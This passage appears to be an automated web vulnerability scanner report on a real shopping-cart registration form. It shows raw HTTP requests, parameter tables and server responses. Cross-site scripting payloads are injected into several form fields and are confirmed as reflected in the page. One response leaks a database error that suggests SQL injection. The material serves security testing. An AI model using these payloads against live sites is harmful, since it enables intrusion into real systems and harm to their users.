<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST '"--></style></script><script>alert(0x000142)</script>
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000142)%3c%2fscript%3e&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:51 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="'"--></style></script><script>netsparker(0x000142)</script>"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST '"--></style></script><script>alert(0x000143)</script>
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 354
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000143)%3c%2fscript%3e&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:31 GMT
Content-Length: 1413
Content-Type: text/html
Expires: Mon, 02 May 2011 03:25:31 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x000143)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST '"--></style></script><script>alert(0x000144)</script>
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000144)%3c%2fscript%3e&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:35 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x000144)</script>"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST '"--></style></script><script>alert(0x000145)</script>
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
